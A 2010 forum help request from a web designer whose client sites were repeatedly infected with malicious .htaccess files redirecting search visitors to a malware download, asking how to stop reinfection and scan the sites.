I have a Windows XP machine and I posted my requet for help on Nutnworks about a week ago. I have AVG anti Virus version 9 and my virus and I routinely have it update and scan automatically. I sent you the zipped .htaccess file today.
I design web sites and one of my web site owners/clients indicated that when he searched for his site on Google and then clicked on the google link to his site, a pop-up appears to download a binary DOS file. This also happens when using other search engine sites (AOL, MSN, Alta Vista ...etc). Once you click off the pop-up ... it never appears again, and the link correctly goes to the web page listed.
My host checked my account and said there were over 300 malicious .htaccess files they had to remove off the server for all of my client web sites. They recommended that I have my PC scanned for viruses or malware because they suspected the program has all my passwords to FTP web pages. I changed all my server passwords online using another PC.
I worked with Tom K at Nutnworks for a couple of days with 6 software downloads to scan everything and my machine was clean last weekend, however the htaccess files have returned to the server even thouggh I changed "all" my passwords, I wrote to the host tech about this and asked him to look at the .htaccess file and he sent the following reply:
"This new .htaccess is indeed malicious - it is redirecting people to the same malware site as before.
It does look like only the .htaccess in .the "deco" account is infected. The only accounts on our server that are having this problem are the ones owned underneath your reseller account, so it continues to look like a piece of malware on the computer you are accessing from that is allowing this to happen."
So I wrote Tom K again about it. He asked me to send the file to Grinler (because I was having problems sending it to Little Eagle at Nutnworks .. getting a server error) for analysis and that's where I stand at this time.
After writing Grinler today I manually went into my 22 client accounts and removed about 60 or so .htaccess files (all the melicious files 4k large), however I did not remove those that I created to access certain secure directories. At this point all my client accounts are clean. Just not sure if I have "anything" on my machine that could cause the files to re-appear. Most of the .htaccess files were dated 10/20/10 ... h9owever they were all removed by my host just last Friday and I changed all my passwords right after they confirmed they werre deleted.
Tom gave me several links referring to the .htaccess files:
A link to a guy who has written a .PHP script to help with cleaning it off: http://alvinjiang.blogspot.com/2010/...to-remove.html
A lonk to a blog from a lady who had the issue:
Tom said if I do a google search on "exgocgkctswo", I would be able to find many other site designers that have been hit like myself- for example: This gal has posted the identical code http://forum.joomla.org/viewtopic.php?p=2260567 You may also notice that this .htaccess code will come up on the search engine for a variety of sites (nascar, real estate, etc..) which leads me to believe that their sites are currently infiltrated with this garbage.
If there's anything you can do to suggest how I can keep this from happening again other than changing my passwords periodically? Is there a program I can use to scan my sites to ensure everything is gone?
Thank you in advance!
Edited by Gutsy, 04 November 2010 - 07:11 PM.